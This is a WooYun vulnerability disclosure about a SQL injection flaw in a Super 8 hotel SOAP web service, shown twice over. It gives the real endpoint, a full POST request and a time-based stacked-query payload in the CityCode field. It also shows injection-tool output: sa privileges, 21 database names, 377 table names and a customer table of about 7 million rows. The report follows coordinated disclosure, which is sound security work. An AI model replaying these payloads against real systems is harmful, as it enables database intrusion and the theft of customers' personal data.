当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160091

漏洞标题:速8某站SQL注入(sa+700万用户泄露)

相关厂商:速8酒店

漏洞作者: Aug0st

提交时间:2015-12-10 18:46

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-10: 细节已通知厂商并且等待厂商处理中
2015-12-10: 厂商已经确认,细节仅向厂商公开
2015-12-20: 细节向核心白帽子及相关领域专家公开
2015-12-30: 细节向普通白帽子公开
2016-01-09: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

rt
webservice接口

详细说明:

地址:这个接口http://ct.super8.com.cn:8081/TeamBuy.svc
提交下面数据:
POST /TeamBuy.svc HTTP/1.1
Content-Type: text/xml
SOAPAction: "http://api.super8.com.cn/TeamBuyConstracts/SeacrhRecommend"
Content-Length: 1556
X-Requested-With: XMLHttpRequest
Host: ct.super8.com.cn:8081
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://api.super8.com.cn/" xmlns:urn2="http://schemas.microsoft.com/2003/10/Serialization/" xmlns:urn3="http://schemas.datacontract.org/2004/07/Super8.Business.Hotel" xmlns:urn4="http://schemas.datacontract.org/2004/07/Super8.Business.Common">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:SeacrhRecommend>
<urn:searchModel>
<urn3:CityCode>string*</urn3:CityCode>
<urn3:CkinTime>1</urn3:CkinTime>
<urn3:EndPrice>1</urn3:EndPrice>
<urn3:OrderField>1</urn3:OrderField>
<urn3:PageIndex>20</urn3:PageIndex>
<urn3:PageSize>20</urn3:PageSize>
<urn3:StartPrice>1</urn3:StartPrice>
<urn3:pages>20</urn3:pages>
<urn3:rsCount>1</urn3:rsCount>
<urn3:ArrDate>01/01/1967</urn3:ArrDate>
<urn3:CheckInDate>01/01/1967</urn3:CheckInDate>
<urn3:CheckOutDate>01/01/1967</urn3:CheckOutDate>
<urn3:OutDate>01/01/1967</urn3:OutDate>
<urn3:Roomnum>1</urn3:Roomnum>
</urn:searchModel>
</urn:SeacrhRecommend>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
CityCode存在注入:
sa权限:
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
current user: 'sa'
数据库:
Parameter: #1* ((custom) POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://api.super8.com.cn/" xmlns:urn2="http://schemas.microsoft.com/2003/10/Serialization/" xmlns:urn3="http://schemas.datacontract.org/2004/07/Super8.Business.Hotel" xmlns:urn4="http://schemas.datacontract.org/2004/07/Super8.Business.Common">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:SeacrhRecommend>
<urn:searchModel>
<urn3:CityCode>string';WAITFOR DELAY '0:0:5'--</urn3:CityCode>
<urn3:CkinTime>1</urn3:CkinTime>
<urn3:EndPrice>1</urn3:EndPrice>
<urn3:OrderField>1</urn3:OrderField>
<urn3:PageIndex>20</urn3:PageIndex>
<urn3:PageSize>20</urn3:PageSize>
<urn3:StartPrice>1</urn3:StartPrice>
<urn3:pages>20</urn3:pages>
<urn3:rsCount>1</urn3:rsCount>
<urn3:ArrDate>01/01/1967</urn3:ArrDate>
<urn3:CheckInDate>01/01/1967</urn3:CheckInDate>
<urn3:CheckOutDate>01/01/1967</urn3:CheckOutDate>
<urn3:OutDate>01/01/1967</urn3:OutDate>
<urn3:Roomnum>1</urn3:Roomnum>
</urn:searchModel>
</urn:SeacrhRecommend>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
available databases [21]:
[*] crs2
[*] crs2_test
[*] crs3
[*] crs_all
[*] crs_report
[*] FHS_SRC
[*] ipegasus3
[*] ipegasus3_empty
[*] ipegasus3_test
[*] ipegasus_gresall
[*] ipegasus_history
[*] ipegasus_mirro
[*] ipegasus_test125
[*] master
[*] model
[*] model2
[*] msdb
[*] s8_new
[*] s8_ws
[*] Super8_DW
[*] tempdb
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
Database: crs_all
[377 tables]
+-----------------------------------------------------------+
| dbo/C_UseRule |
| dbo/Nu_MyFavorites |
| dbo/PM_Type |
| dbo1PMS_SynchronousData\x11 |
| AC_PMSEmailLog |
| A_AOrder |
| A_DA |
| A_temp |
| AliPaySuccessIngo |
| AliPay_Zfb_DrawbackPayInfo |
| AliPay_Zfb_PayMentInfo |
| CC_CCHotelPride |
| CC_CCRoomPrice |
| CC_ContactInfo |
| CC_CorpCustomer |
| CC_MonthlyYeport |
| CC_PriceRemoveDate |
| C_AddsService |
| C_CardMake |
| C_CardNoSection |
| C_CardOutStorage |
| C_CardResource |
| C_OpenCerdZrmfer |
| C_OpenCoupqn |
| C_PointYule |
| C_UpgradeRule |
| Co_CouponActivityCode |
| Co_CouponCardType |
| Co_CouponMake |
| Co_CouponOutStorage |
| Co_CouponType |
| Co_HotelCouponSet |
| Co_HotelCouponSet_Detail |
| Co_HotelRemoveDate |
| Co_HotelRoomCouponSet |
| Cu_ActiveVerifyCode |
| Cu_AmAccount |
| Cu_AmAcqouny_Log |
| Cu_AvailableCard |
| Cu_CardCancellation |
| Cu_CreditCard |
| Cu_CusImportLogDetail |
| Cu_CusOperation |
| Cu_CustLeaveWord |
| Cu_CustomerInfo |
| Cu_CustomerLog |
| Cu_Frequentaen |
| Cu_Jointlogin |
| Cu_Partner_Relation |
| Cu_RefuseHotel |
| Cu_RoomDay |
| Cu_RoomDay_bak20150712 |
| Cu_SMS |
| Cu_aontactMeans |
| Cu_ausMmportLog |
| Cw_CouponInfo |
| Cy_CouponkoYection |
| Dic_ActivityType |
| Dic_AddsServiceType |
| Dic_Bank |
| Dic_BreakfastType |
| Dic_Codes |
| Dic_CodesCategory |
| Dic_ContactType |
| Dic_FadilityTypeRoot |
| Dic_HPContactPosition |
| Dic_HPPictureType |
| Dic_LandMrkMainType |
| Dic_LandMrkType |
| Dic_LanguateType |
| Dic_MapType |
| Dic_MarketActivity |
| Dic_National |
| Dic_NtChkChannel |
| Dic_NtChkType |
| Dic_OperationType |
| Dic_OrderCancelReason |
| Dic_OrderFlowStatus |
| Dic_OrderInformerType |
| Dic_OrderRoomArrStatus |
| Dic_PasswordQuestion |
| Dic_RDReason |
| Dic_Race |
| Dic_RoomArrType |
| Dic_RoomDayItem |
| Dic_RoomNSReason |
| Dic_Roomtype |
| Dic_SMSType |
| Dic_SecondRedReasion |
| Dic_StAdjustmentReasion |
| Dic_WOSmallType |
| Dic_arderStatus |
| Dio_FacilityType |
| Do_CouponResource |
| HC_Channel |
| HC_ChannelHotel |
| HC_Channel_InfoLog |
| HC_Col_PostLqg |
| HC_CpntactInfo |
| HC_HRSRemoveDate |
| HC_HotelPriceType |
| HC_HotelRoomStatusDeyail |
| HC_IOConfig |
| HC_IaLimit |
| HC_InfoConfirg |
| HC_NonFreeSet |
| HC_PayCancelPolicy |
| HC_RoomPriceType |
| HIO_GstInfo |
| HIO_OrderPrice |
| HIO_OrdesInfo |
| HP_BKRemoveDate |
| HP_BK_PriceType |
| HP_CommissionDetail |
| HP_ContactMeans |
| HP_Email |
| HP_Fax |
| HP_FinanceInfo |
| HP_FreeRoom |
| HP_GuarantyRemoveDate |
| HP_GuarantyRule |
| HP_GuarantyRule_RoomType |
| HP_HPOrderRuleHPRmYype |
| HP_HPTipsHPRmType |
| HP_HotelActivity |
| HP_HotelBaseInfo |
| HP_HotelDailyRepouts |
| HP_HotelNightAuditState |
| HP_HotelOutMapping |
| HP_HotelOwner |
| HP_HotelPicture |
| HP_HotelRoom |
| HP_HotelRoomStatus_Room |
| HP_HotelRoom_HIS |
| HP_HotelSort |
| HP_HotelSpecProperty |
| HP_HotelStatuyLog |
| HP_HotelTips_Channel |
| HP_HotelTips_RoomType |
| HP_Hotel_Owner |
| HP_HourRoomRule |
| HP_HqtelPMaConfig |
| HP_IontactWay |
| HP_LandMrk |
| HP_MapInfo |
| HP_MktActRemoveDate |
| HP_MktAct_CardType |
| HP_MktAct_Channel |
| HP_MktAct_RoomType |
| HP_PriceCard |
| HP_PriceRule |
| HP_RoomBreakfast |
| HP_RoomCurStatus |
| HP_RoomDetail |
| HP_RoomType_Breakfast |
| HP_ServiceFacility |
| HP_StatementsRule |
| HP_Tips |
| HR_HotelBaseInfo_QueryCity |
| His_Order_Coupons |
| His_Order_GstInfo |
| His_Order_Info |
| His_Order_PriceSectionInfo |
| His_Order_RmdyInfo |
| ITB_AccountDetail |
| ITB_GoodsInfo |
| ITB_GoodsType |
| ITB_MonthDetail |
| ITB_OnGoingFeeDetail |
| ITB_Order |
| ITB_OrderGoods |
| ITB_UnfinishedOrderInfo |
| ITQ_OrderOptDetail |
| Order_ConfirmerLog |
| Order_ConfirmerOnline |
| Order_ConsumptionDetail |
| Order_ConsumptionOpt |
| Order_Coupons |
| Order_CreditOrderInfo |
| Order_CreditOrdeuPrice |
| Order_CredktOrderOptInfo |
| Order_Email |
| Order_Fax |
| Order_GresOtrlt |
| Order_GstInfo |
| Order_GtyPayPolicy |
| Order_Info |
| Order_Interrelated |
| Order_NtChkRecord |
| Order_NtChkSign |
| Order_NtChker |
| Order_NtChq_DayLog |
| Order_OptInfo |
| Order_OrderLog |
| Order_Pay_Lqg |
| Order_PaymenuInfo |
| Order_PriqeSectionInfo |
| Order_ReCall_Pay_Log |
| Order_RmdyInfo |
| Order_SMS |
| Order_StatisticsInfo |
| Order_Task |
| Ordes_OccuptLock |
| Ordeu_TempInfor |
| PMS_ConnectConfig |
| PMS_HotelNetStatus |
| PMS_SynErrorrLog |
| PMS_Task |
| PMS_User |
| PM_GiftExpansion |
| PM_GiftPartner |
| PM_Order |
| PM_OrderOperation |
| PM_SFTP_Sended |
| PM_Stage |
| P_HotelPriceDetail |
| P_HotelPrqce |
| P_HotelRoomPrice |
| P_HotelSpecialPrice |
| P_HotelSpecialPrice_CardType |
| P_HotelSpecialPrmce_Channel |
| P_HourRoomPriceDetail |
| P_HourRoomStatus |
| P_PriceRemoveDate |
| P_PriceType |
| P_PriceTypeCardType |
| P_PriceType_Channel |
| P_RoomSpecialPrice |
| P_SpecialPriceDetail |
| P_SpecialPriceDetail_Channel |
| P_SpecialPrice_DetailCardType |
| P_SuperRemoveDate |
| PaySt_OrderInfo |
| PaySt_SeparateOptIqfo |
| PaySt_StOptInfo |
| PaySt_StatementsInfo |
| PaySy_Separate |
| PayYt_StInfoSeparate |
| RP_OrderNight |
| RP_OrderNight_ST |
| RS_BigActivity |
| RS_BigActivity_Hotel |
| RS_CRoomRemoveDate |
| RS_CurRoomQuantity_His |
| RS_CurrentRoomStatus |
| RS_HotelQuatity |
| RS_PreORemoveDate |
| RS_PreOccupt |
| RS_PreOccuptDetail |
| RS_PreOccuptDetail_Channel |
| RS_PreOccupt_Channel |
| RS_PreOccupt_Room |
| RS_RoomStatusDetail |
| RS_RoomStatusDetail_ahannel |
| RS_RoomStatus_Room |
| RT_CurRoomQuantity |
| RY_RoomStatus |
| St_OptInfo |
| St_OrderGstStInfo |
| St_PaymentRecords |
| St_StChannel_OptInfo |
| St_StChannel_Order |
| St_StatementsInfo |
| SyncBeyondhAvailableRoomsCount |
| Sys_BarCode |
| Sys_CRSCodesDetail |
| Sys_Day |
| Sys_DayALL |
| Sys_EmailSent |
| Sys_FaxSent |
| Sys_FaxType |
| Sys_GlobalQdentity |
| Sys_GuestTemp |
| Sys_Holiday |
| Sys_KB |
| Sys_KBTag |
| Sys_KBTagaKB |
| Sys_KBType |
| Sys_LandMrk |
| Sys_LandMrk_Type |
| Sys_MQType |
| Sys_Num |
| Sys_OptInfoLog |
| Sys_OrderDesc |
| Sys_OrderRule |
| Sys_PayChannel |
| Sys_PayChbnqel_Bank |
| Sys_ReceiveFax |
| Sys_Region |
| Sys_SMSSending |
| Sys_SMSSent |
| Sys_SMSVgrifyCode |
| Sys_Sales |
| Sys_SysLog |
| Sys_SysLogDetbil |
| Sys_TelRecord |
| Sys_Weather |
| Sys_WebServerRes |
| Syy_DataMapping |
| TB_Code |
| TB_Holiday |
| TB_Holiday_Type |
| TB_Hotel |
| TB_NOHotel |
| TB_Rate |
| TB_RatePlan |
| TB_Room |
| TQ_YoonType |
| UP_Deparyment |
| UP_Position |
| UP_Role |
| UP_RoleFunction |
| UP_User |
| UP_UserFunction |
| Ut_Statements_Channel |
| WO_OptRecord |
| WO_WprkOrder |
| Cy~Lt~pWs{~o宅yp|ᨂxtd\x0e\x0f\x10{X\x04oB\x06to\x12#nu\x02g0 |
| HC_PCPolicyPriceelation |
| HP_Custpmesdule\x02 |
| Order_ConfirmerOnlineLog\x03! |
| Order_Gt}Infp |
| TB_RooqModel! |
| Weixin_Mapping! |
| ic_IDType |
| iqo.TenPi{_DrawBaclPayInfo |
| tm_roomImg\x0c\x05 |
| vw_HotelStDunniniList\x05 |
| ays_FaxSend |
| ays_SMSReceive |
| customermobile |
| customertemp |
| eboAHP_MktAdt |
| lew1ywqFHBlacklist_Reason |
| oldcrscust |
| oldcrscust1 |
| orderdatelist |
| orderidlist |
| qqc_OrderTaskType |
| sysiiagrams |
| vwUsefulLandMrk |
| vw_ChannelInfoLog |
| vw_CompanyUpgradeList |
| vw_Hotel |
| vw_HotelBreakfastList |
| vw_HotelPMSConfih |
| vw_HourRoqmPriceLqst |
| vw_OrdeuTaskList |
| vw_PayUtGenerateSeparateList |
| vwaHotelStDosDunningList |
| dbo1Wgb_NeysKnfo |
| dboADic_NormRoomtype |
| dboAHP_OrqerRule |
| dboATB_TMHotel |
| dbp.YQaHotelRoomStatus |
| dco.Dic_EmailType |
| dco.P_HourRoomPrice |
| deo.C_CardType |
| deo.Dic_CustomerFailReasion |
| deo.Dic_GuestBlacklist |
| deo.St_StatementsAdditional |
| deo.vw_HotelYtatemenysList |
| dio.Sys_MQDetail |
| dqo.HP_BKDetail |
| dqo.ITB_ShpppingTempInfo |
| dqo.ITEbAccount |
| dqo.PM_GiftShow |
| dqo.Sys_CrsCodes |
| dyo.Web_Activity |
| ebo.UP_UserRole |
| ero.UP_Function |
| ibo.RS_RoomStatus_Channel |
| ibo.aic_WOBigType |
| qbo.Order_CopRelation |
| qbo.arder_ConsumptionBill |
| rbo.PM_Gkfts |
| sbo.HP_HPGuarantyRuleHPRmType |
近700万用户:
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
Database: crs_all
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| dbo.Cu_CustomerInfo | 6998132 |
+---------------------+---------+
+-----------------------------------------------------------+

漏洞证明:

地址:这个接口http://ct.super8.com.cn:8081/TeamBuy.svc
提交下面数据:
POST /TeamBuy.svc HTTP/1.1
Content-Type: text/xml
SOAPAction: "http://api.super8.com.cn/TeamBuyConstracts/SeacrhRecommend"
Content-Length: 1556
X-Requested-With: XMLHttpRequest
Host: ct.super8.com.cn:8081
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://api.super8.com.cn/" xmlns:urn2="http://schemas.microsoft.com/2003/10/Serialization/" xmlns:urn3="http://schemas.datacontract.org/2004/07/Super8.Business.Hotel" xmlns:urn4="http://schemas.datacontract.org/2004/07/Super8.Business.Common">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:SeacrhRecommend>
<urn:searchModel>
<urn3:CityCode>string*</urn3:CityCode>
<urn3:CkinTime>1</urn3:CkinTime>
<urn3:EndPrice>1</urn3:EndPrice>
<urn3:OrderField>1</urn3:OrderField>
<urn3:PageIndex>20</urn3:PageIndex>
<urn3:PageSize>20</urn3:PageSize>
<urn3:StartPrice>1</urn3:StartPrice>
<urn3:pages>20</urn3:pages>
<urn3:rsCount>1</urn3:rsCount>
<urn3:ArrDate>01/01/1967</urn3:ArrDate>
<urn3:CheckInDate>01/01/1967</urn3:CheckInDate>
<urn3:CheckOutDate>01/01/1967</urn3:CheckOutDate>
<urn3:OutDate>01/01/1967</urn3:OutDate>
<urn3:Roomnum>1</urn3:Roomnum>
</urn:searchModel>
</urn:SeacrhRecommend>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
CityCode存在注入:
sa权限:
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
current user: 'sa'
数据库:
Parameter: #1* ((custom) POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://api.super8.com.cn/" xmlns:urn2="http://schemas.microsoft.com/2003/10/Serialization/" xmlns:urn3="http://schemas.datacontract.org/2004/07/Super8.Business.Hotel" xmlns:urn4="http://schemas.datacontract.org/2004/07/Super8.Business.Common">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:SeacrhRecommend>
<urn:searchModel>
<urn3:CityCode>string';WAITFOR DELAY '0:0:5'--</urn3:CityCode>
<urn3:CkinTime>1</urn3:CkinTime>
<urn3:EndPrice>1</urn3:EndPrice>
<urn3:OrderField>1</urn3:OrderField>
<urn3:PageIndex>20</urn3:PageIndex>
<urn3:PageSize>20</urn3:PageSize>
<urn3:StartPrice>1</urn3:StartPrice>
<urn3:pages>20</urn3:pages>
<urn3:rsCount>1</urn3:rsCount>
<urn3:ArrDate>01/01/1967</urn3:ArrDate>
<urn3:CheckInDate>01/01/1967</urn3:CheckInDate>
<urn3:CheckOutDate>01/01/1967</urn3:CheckOutDate>
<urn3:OutDate>01/01/1967</urn3:OutDate>
<urn3:Roomnum>1</urn3:Roomnum>
</urn:searchModel>
</urn:SeacrhRecommend>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
available databases [21]:
[*] crs2
[*] crs2_test
[*] crs3
[*] crs_all
[*] crs_report
[*] FHS_SRC
[*] ipegasus3
[*] ipegasus3_empty
[*] ipegasus3_test
[*] ipegasus_gresall
[*] ipegasus_history
[*] ipegasus_mirro
[*] ipegasus_test125
[*] master
[*] model
[*] model2
[*] msdb
[*] s8_new
[*] s8_ws
[*] Super8_DW
[*] tempdb
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
Database: crs_all
[377 tables]
+-----------------------------------------------------------+
| dbo/C_UseRule |
| dbo/Nu_MyFavorites |
| dbo/PM_Type |
| dbo1PMS_SynchronousData\x11 |
| AC_PMSEmailLog |
| A_AOrder |
| A_DA |
| A_temp |
| AliPaySuccessIngo |
| AliPay_Zfb_DrawbackPayInfo |
| AliPay_Zfb_PayMentInfo |
| CC_CCHotelPride |
| CC_CCRoomPrice |
| CC_ContactInfo |
| CC_CorpCustomer |
| CC_MonthlyYeport |
| CC_PriceRemoveDate |
| C_AddsService |
| C_CardMake |
| C_CardNoSection |
| C_CardOutStorage |
| C_CardResource |
| C_OpenCerdZrmfer |
| C_OpenCoupqn |
| C_PointYule |
| C_UpgradeRule |
| Co_CouponActivityCode |
| Co_CouponCardType |
| Co_CouponMake |
| Co_CouponOutStorage |
| Co_CouponType |
| Co_HotelCouponSet |
| Co_HotelCouponSet_Detail |
| Co_HotelRemoveDate |
| Co_HotelRoomCouponSet |
| Cu_ActiveVerifyCode |
| Cu_AmAccount |
| Cu_AmAcqouny_Log |
| Cu_AvailableCard |
| Cu_CardCancellation |
| Cu_CreditCard |
| Cu_CusImportLogDetail |
| Cu_CusOperation |
| Cu_CustLeaveWord |
| Cu_CustomerInfo |
| Cu_CustomerLog |
| Cu_Frequentaen |
| Cu_Jointlogin |
| Cu_Partner_Relation |
| Cu_RefuseHotel |
| Cu_RoomDay |
| Cu_RoomDay_bak20150712 |
| Cu_SMS |
| Cu_aontactMeans |
| Cu_ausMmportLog |
| Cw_CouponInfo |
| Cy_CouponkoYection |
| Dic_ActivityType |
| Dic_AddsServiceType |
| Dic_Bank |
| Dic_BreakfastType |
| Dic_Codes |
| Dic_CodesCategory |
| Dic_ContactType |
| Dic_FadilityTypeRoot |
| Dic_HPContactPosition |
| Dic_HPPictureType |
| Dic_LandMrkMainType |
| Dic_LandMrkType |
| Dic_LanguateType |
| Dic_MapType |
| Dic_MarketActivity |
| Dic_National |
| Dic_NtChkChannel |
| Dic_NtChkType |
| Dic_OperationType |
| Dic_OrderCancelReason |
| Dic_OrderFlowStatus |
| Dic_OrderInformerType |
| Dic_OrderRoomArrStatus |
| Dic_PasswordQuestion |
| Dic_RDReason |
| Dic_Race |
| Dic_RoomArrType |
| Dic_RoomDayItem |
| Dic_RoomNSReason |
| Dic_Roomtype |
| Dic_SMSType |
| Dic_SecondRedReasion |
| Dic_StAdjustmentReasion |
| Dic_WOSmallType |
| Dic_arderStatus |
| Dio_FacilityType |
| Do_CouponResource |
| HC_Channel |
| HC_ChannelHotel |
| HC_Channel_InfoLog |
| HC_Col_PostLqg |
| HC_CpntactInfo |
| HC_HRSRemoveDate |
| HC_HotelPriceType |
| HC_HotelRoomStatusDeyail |
| HC_IOConfig |
| HC_IaLimit |
| HC_InfoConfirg |
| HC_NonFreeSet |
| HC_PayCancelPolicy |
| HC_RoomPriceType |
| HIO_GstInfo |
| HIO_OrderPrice |
| HIO_OrdesInfo |
| HP_BKRemoveDate |
| HP_BK_PriceType |
| HP_CommissionDetail |
| HP_ContactMeans |
| HP_Email |
| HP_Fax |
| HP_FinanceInfo |
| HP_FreeRoom |
| HP_GuarantyRemoveDate |
| HP_GuarantyRule |
| HP_GuarantyRule_RoomType |
| HP_HPOrderRuleHPRmYype |
| HP_HPTipsHPRmType |
| HP_HotelActivity |
| HP_HotelBaseInfo |
| HP_HotelDailyRepouts |
| HP_HotelNightAuditState |
| HP_HotelOutMapping |
| HP_HotelOwner |
| HP_HotelPicture |
| HP_HotelRoom |
| HP_HotelRoomStatus_Room |
| HP_HotelRoom_HIS |
| HP_HotelSort |
| HP_HotelSpecProperty |
| HP_HotelStatuyLog |
| HP_HotelTips_Channel |
| HP_HotelTips_RoomType |
| HP_Hotel_Owner |
| HP_HourRoomRule |
| HP_HqtelPMaConfig |
| HP_IontactWay |
| HP_LandMrk |
| HP_MapInfo |
| HP_MktActRemoveDate |
| HP_MktAct_CardType |
| HP_MktAct_Channel |
| HP_MktAct_RoomType |
| HP_PriceCard |
| HP_PriceRule |
| HP_RoomBreakfast |
| HP_RoomCurStatus |
| HP_RoomDetail |
| HP_RoomType_Breakfast |
| HP_ServiceFacility |
| HP_StatementsRule |
| HP_Tips |
| HR_HotelBaseInfo_QueryCity |
| His_Order_Coupons |
| His_Order_GstInfo |
| His_Order_Info |
| His_Order_PriceSectionInfo |
| His_Order_RmdyInfo |
| ITB_AccountDetail |
| ITB_GoodsInfo |
| ITB_GoodsType |
| ITB_MonthDetail |
| ITB_OnGoingFeeDetail |
| ITB_Order |
| ITB_OrderGoods |
| ITB_UnfinishedOrderInfo |
| ITQ_OrderOptDetail |
| Order_ConfirmerLog |
| Order_ConfirmerOnline |
| Order_ConsumptionDetail |
| Order_ConsumptionOpt |
| Order_Coupons |
| Order_CreditOrderInfo |
| Order_CreditOrdeuPrice |
| Order_CredktOrderOptInfo |
| Order_Email |
| Order_Fax |
| Order_GresOtrlt |
| Order_GstInfo |
| Order_GtyPayPolicy |
| Order_Info |
| Order_Interrelated |
| Order_NtChkRecord |
| Order_NtChkSign |
| Order_NtChker |
| Order_NtChq_DayLog |
| Order_OptInfo |
| Order_OrderLog |
| Order_Pay_Lqg |
| Order_PaymenuInfo |
| Order_PriqeSectionInfo |
| Order_ReCall_Pay_Log |
| Order_RmdyInfo |
| Order_SMS |
| Order_StatisticsInfo |
| Order_Task |
| Ordes_OccuptLock |
| Ordeu_TempInfor |
| PMS_ConnectConfig |
| PMS_HotelNetStatus |
| PMS_SynErrorrLog |
| PMS_Task |
| PMS_User |
| PM_GiftExpansion |
| PM_GiftPartner |
| PM_Order |
| PM_OrderOperation |
| PM_SFTP_Sended |
| PM_Stage |
| P_HotelPriceDetail |
| P_HotelPrqce |
| P_HotelRoomPrice |
| P_HotelSpecialPrice |
| P_HotelSpecialPrice_CardType |
| P_HotelSpecialPrmce_Channel |
| P_HourRoomPriceDetail |
| P_HourRoomStatus |
| P_PriceRemoveDate |
| P_PriceType |
| P_PriceTypeCardType |
| P_PriceType_Channel |
| P_RoomSpecialPrice |
| P_SpecialPriceDetail |
| P_SpecialPriceDetail_Channel |
| P_SpecialPrice_DetailCardType |
| P_SuperRemoveDate |
| PaySt_OrderInfo |
| PaySt_SeparateOptIqfo |
| PaySt_StOptInfo |
| PaySt_StatementsInfo |
| PaySy_Separate |
| PayYt_StInfoSeparate |
| RP_OrderNight |
| RP_OrderNight_ST |
| RS_BigActivity |
| RS_BigActivity_Hotel |
| RS_CRoomRemoveDate |
| RS_CurRoomQuantity_His |
| RS_CurrentRoomStatus |
| RS_HotelQuatity |
| RS_PreORemoveDate |
| RS_PreOccupt |
| RS_PreOccuptDetail |
| RS_PreOccuptDetail_Channel |
| RS_PreOccupt_Channel |
| RS_PreOccupt_Room |
| RS_RoomStatusDetail |
| RS_RoomStatusDetail_ahannel |
| RS_RoomStatus_Room |
| RT_CurRoomQuantity |
| RY_RoomStatus |
| St_OptInfo |
| St_OrderGstStInfo |
| St_PaymentRecords |
| St_StChannel_OptInfo |
| St_StChannel_Order |
| St_StatementsInfo |
| SyncBeyondhAvailableRoomsCount |
| Sys_BarCode |
| Sys_CRSCodesDetail |
| Sys_Day |
| Sys_DayALL |
| Sys_EmailSent |
| Sys_FaxSent |
| Sys_FaxType |
| Sys_GlobalQdentity |
| Sys_GuestTemp |
| Sys_Holiday |
| Sys_KB |
| Sys_KBTag |
| Sys_KBTagaKB |
| Sys_KBType |
| Sys_LandMrk |
| Sys_LandMrk_Type |
| Sys_MQType |
| Sys_Num |
| Sys_OptInfoLog |
| Sys_OrderDesc |
| Sys_OrderRule |
| Sys_PayChannel |
| Sys_PayChbnqel_Bank |
| Sys_ReceiveFax |
| Sys_Region |
| Sys_SMSSending |
| Sys_SMSSent |
| Sys_SMSVgrifyCode |
| Sys_Sales |
| Sys_SysLog |
| Sys_SysLogDetbil |
| Sys_TelRecord |
| Sys_Weather |
| Sys_WebServerRes |
| Syy_DataMapping |
| TB_Code |
| TB_Holiday |
| TB_Holiday_Type |
| TB_Hotel |
| TB_NOHotel |
| TB_Rate |
| TB_RatePlan |
| TB_Room |
| TQ_YoonType |
| UP_Deparyment |
| UP_Position |
| UP_Role |
| UP_RoleFunction |
| UP_User |
| UP_UserFunction |
| Ut_Statements_Channel |
| WO_OptRecord |
| WO_WprkOrder |
